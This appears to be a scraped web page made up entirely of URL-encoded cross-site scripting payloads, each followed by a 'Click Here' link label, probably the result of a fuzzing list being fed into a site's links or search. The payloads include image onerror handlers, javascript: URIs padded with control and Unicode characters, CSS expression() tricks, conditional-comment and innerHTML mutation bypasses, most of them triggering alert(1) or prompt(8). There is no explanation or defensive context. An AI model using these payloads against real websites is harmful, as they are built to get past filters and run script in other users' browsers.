SJETAClick Here

SJETAClick Here

SJETAClick Here

SJETAClick Here

SJETAClick Here

SJETAClick Here

%3cdiv%20id%3dd%3e%3cdiv%20style%3d%22font-family%3a'sans%5c27%5c3B%20color%5c3Ared%5c3B'%22%3eX%3c%2fdiv%3e%3c%2fdiv%3e%20%3cscript%3ewith(document%2egetElementById(%22d%22))innerHTML%3dinnerHTML%3c%2fscript%3eClick Here

%3cdiv%20style%3d%22list-style%3aurl(http%3a%2f%2ffoo%2ef)%5c20url(javascript%3ajavascript%3aalert(1))%3b%22%3eXClick Here

%3cdiv%20style%3dcontent%3aurl(%(svg)s)%3e%3c%2fdiv%3eClick Here

%3cdiv%20style%3d%22font-family%3a'foo%26%2310%3b%3bcolor%3ared%3b'%3b%22%3eXXXClick Here

%3cimage%20src%2fonerror%3dprompt(8)%3eClick Here

%3cimg%2fsrc%2fonerror%3dprompt(8)%3eClick Here

%22onclick%3dprompt(8)%3e%22@x%2eyClick Here

'%3ba%3dprompt,a()%2f%2fClick Here

%22-eval(%22window['pro'%2B'mpt'](8)%22)-%22Click Here

'-eval(%22window['pro'%2B'mpt'](8)%22)-'Click Here

%22%3ba%3dprompt,a()%2f%2fClick Here

'-prompt(8)-'Click Here

santanuClick Here

%22-prompt(8)-%22Click Here

%3cstyle%3e%2a%7bx%3aEXPRESSION(javascript%3aalert(1))%7d%3c%2fstyle%3eClick Here

%3c%2f%2f%20style%3dx%3aexpression%5c28javascript%3aalert(1)%5c29%3eClick Here

%3cdiv%20style%3d%22font-family%3afoo%7dcolor%3dred%3b%22%3eXXXClick Here

%3cstyle%3e%2a[%7b%7d@import'%(css)s%3f]%3c%2fstyle%3eXClick Here

%3ca%20style%3d%22pointer-events%3anone%3bposition%3aabsolute%3b%22%3e%3ca%20style%3d%22position%3aabsolute%3b%22%20onclick%3d%22javascript%3aalert(1)%3b%22%3eXXX%3c%2fa%3e%3c%2fa%3e%3ca%20href%3d%22javascript%3ajavascript%3aalert(1)%22%3eXXX%3c%2fa%3eClick Here

%3cstyle%3e@import%20%22data%3a,%2a%7bx%3aexpression(javascript%3aalert(1))%7D%22%3b%3c%2fstyle%3eClick Here

%3cstyle%3ep[foo%3dbar%7b%7d%2a%7b-o-link%3a'javascript%3ajavascript%3aalert(1)'%7d%7b%7d%2a%7b-o-link-source%3acurrent%7d]%7bcolor%3ared%7d%3b%3c%2fstyle%3eClick Here

%3clink%20rel%3dstylesheet%20href%3ddata%3a,%2a%7bx%3aexpression(javascript%3aalert(1))%7dClick Here

%3ca%20style%3d%22-o-link%3a'javascript%3ajavascript%3aalert(1)'%3b-o-link-source%3acurrent%22%3eXClick Here

%3cscript%20src%3d%22%5c%5c%(jscript)s%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22%2f%5c%(jscript)s%22%3e%3c%2fscript%3eClick Here

%3c!--[if]%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%20--%3eClick Here

%3c!--[if%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f]%3e%20--%3eClick Here

%3ca%20href%3dhttp%3a%2f%2ffoo%2ebar%2f%23x%3d%60y%3e%3c%2fa%3e%3cimg%20alt%3d%22%60%3e%3cimg%20src%3dx%3ax%20onerror%3djavascript%3aalert(1)%3e%3c%2fa%3e%22%3eClick Here

%3ctitle%20onpropertychange%3djavascript%3aalert(1)%3e%3c%2ftitle%3e%3ctitle%20title%3d%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx00%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%20onerror%20%2f%22%20'%22%3d%20alt%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3ca%20href%3djava%26%231%26%232%26%233%26%234%26%235%26%236%26%237%26%238%26%2311%26%2312script%3ajavascript%3aalert(1)%3eXXX%3c%2fa%3eClick Here

%3cimg%20src%3d%22x%60%20%60%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%60%20%60%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx12%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx32%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx10%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx09%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx11%22javascript%3aalert(1)%22%3eClick Here

%3cimg[a][b][c]src[d]%3dx[e]onerror%3d[f]%22alert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx11onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx12onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx13onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx10onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx09onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx00%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx11%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx47%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx12%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx32%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx09%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx10%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx13%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx39src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx00src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx34src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx32src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx11src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx13src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx10src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx11src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx00src%3dx%20onerror%3d%22alert(1)%22%3eClick Here

%3cimg%20%5cx12src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cdiv%20id%3dd%3e%3cx%20xmlns%3d%22%3e%3ciframe%20onload%3djavascript%3aalert(1)%22%3e%3c%2fdiv%3e%20%3cscript%3ed%2einnerHTML%3dd%2einnerHTML%3c%2fscript%3eClick Here

%3c%%20foo%3e%3cx%20foo%3d%22%%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c!%20foo%3d%22[[[Inception]]%22%3e%3cx%20foo%3d%22]foo%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c%3f%20foo%3d%22%3e%3cx%20foo%3d'%3f%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e'%3e%22%3eClick Here

%3c%2f%20foo%3d%22%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c%3f%20foo%3d%22%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c!%20foo%3d%22%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3cdiv%20style%3dwidth%3a1px%3bfilter%3aglow%20onfilterchange%3djavascript%3aalert(1)%3exClick Here

%3cimage%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cscript%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cx%20'%3d%22foo%22%3e%3cx%20foo%3d'%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f'%3eClick Here

%3cembed%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cb%20%3cscript%3ealert(1)%3c%2fscript%3e0Click Here

%3cembed%20src%3d%22data%3atext%2fhtml%3bbase64,%(base64)s%22%3eClick Here

%3cOBJECT%20CLASSID%3d%22clsid%3a333C7BC4-460F-11D0-BC04-0080C7055A83%22%3e%3cPARAM%20NAME%3d%22DataURL%22%20VALUE%3d%22javascript%3aalert(1)%22%3e%3c%2fOBJECT%3eClick Here

%3cobject%20data%3d%22data%3atext%2fhtml%3bbase64,%(base64)s%22%3eClick Here

%3cSCRIPT%20FOR%3ddocument%20EVENT%3donreadystatechange%3ejavascript%3aalert(1)%3c%2fSCRIPT%3eClick Here

%3chead%3e%3cbase%20href%3d%22javascript%3a%2f%2f%22%3e%3c%2fhead%3e%3cbody%3e%3ca%20href%3d%22%2f%2e%20%2f,javascript%3aalert(1)%2f%2f%23%22%3eXXX%3c%2fa%3e%3c%2fbody%3eClick Here

%3cli%20style%3dlist-style%3aurl()%20onerror%3djavascript%3aalert(1)%3e%20%3cdiv%20style%3dcontent%3aurl(data%3aimage%2fsvg%2bxml,%%3Csvg%2f%%3E)%3bvisibility%3ahidden%20onload%3djavascript%3aalert(1)%3e%3c%2fdiv%3eClick Here

%3cstyle%3e%3cimg%20src%3d%22%3c%2fstyle%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3c![%3e%3cimg%20src%3d%22]%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3ccomment%3e%3cimg%20src%3d%22%3c%2fcomment%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1))%2f%2f%22%3eClick Here

%3ctable%20background%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cframeset%20onload%3djavascript%3aalert(1)%3eClick Here

%3c!--%3cimg%20src%3d%22--%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3cbody%20oninput%3djavascript%3aalert(1)%3e%3cinput%20autofocus%3eClick Here

%3cvideo%20onerror%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3csource%3eClick Here

%3cform%3e%3cbutton%20formaction%3d%22javascript%3ajavascript%3aalert(1)%22%3eXClick Here

%3cvideo%3e%3csource%20onerror%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cform%20id%3dtest%20onforminput%3djavascript%3aalert(1)%3e%3cinput%3e%3c%2fform%3e%3cbutton%20form%3dtest%20onformchange%3djavascript%3aalert(1)%3eXClick Here

%3cvideo%20poster%3djavascript%3ajavascript%3aalert(1)%2f%2fClick Here

%3cinput%20onblur%3djavascript%3aalert(1)%20autofocus%3e%3cinput%20autofocus%3eClick Here

%3cinput%20onfocus%3djavascript%3aalert(1)%20autofocus%3eClick Here

%3cimg%20src%3d%23%20onerror%5cx3D%22javascript%3aalert(1)%22%20%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%5cx00%2fscript%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx20%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx09%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0A%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0C%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0D%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx00%3djavascript%3aalert(1)%3eClick Here

%3cscript%5cx09%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0B%3djavascript%3aalert(1)%3eClick Here

%3cscript%5cx0C%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx00%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx0A%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx0D%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx20%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx2F%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx60javascript%3aalert(1)%5cx60src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx20javascript%3aalert(1)%5cx20src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Djavascript%3aalert(1)%5cx0Dsrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Ajavascript%3aalert(1)%5cx0Asrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Cjavascript%3aalert(1)%5cx0Csrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx27javascript%3aalert(1)%5cx27src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx09javascript%3aalert(1)%5cx09src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx22javascript%3aalert(1)%5cx22src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Bjavascript%3aalert(1)%5cx0Bsrc%3dxxx%3ax%20%2f%3eClick Here

%22%60'%3e%3cscript%3e%5cx20javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxC2%5cxA0javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE1%5cxA0%5cx8Ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx86javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx82javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx21javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx80javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxEF%5cxBF%5cxBEjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx8Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx83javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxEF%5cxBF%5cxAEjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxC2%5cx85javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cxA9javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx81%5cx9Fjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx87javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx7Ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cxAFjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Ajavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxF0%5cx90%5cx96%5cx9Ajavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e-javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx2Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE1%5cx9A%5cx80javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Cjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx88javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx8Ajavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx00javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cxA8javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx85javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx09javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx89javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx84javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE3%5cx80%5cx80javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx81javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxEF%5cxBB%5cxBFjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Djavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx3Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx20onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx00onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx27onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Conerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx09onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx2Fonerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Bonerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Donerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Aonerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx22onerror%3djavascript%3aalert(1)%3eClick Here

%3ca%20href%3d%22javascript%5cx0A%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx09%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx0D%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx3A%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Cjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx00%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx81%5cx9Fjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Ejavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx85javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Bjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cxA9javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx06javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx02javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx16javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Cjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cxA8javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx15javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Ajavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Djavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE3%5cx80%5cx80javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx12javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx84javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx86javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx08javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx01javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx04javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx83javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE1%5cx9A%5cx80javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx87javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx07javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx81javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Djavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Fjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cxAFjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx19javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx8Ajavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx14javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx09javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx13javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx20javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx82javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx10javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx00javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Ajavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Ejavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx03javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx17javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx80javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx89javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx88javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx18javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx11javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE1%5cxA0%5cx8Ejavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx05javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx89expression(javascript%3aalert(1)%22%3eDEFClick Here

%3ca%20href%3d%22%5cx0Fjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxC2%5cxA0javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Bjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx83expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx85expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx81expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx82expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Bexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx8Bexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx86expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx00expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx88expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx20expression(javascript%3aalert(1)%22%3eDEFClick Here

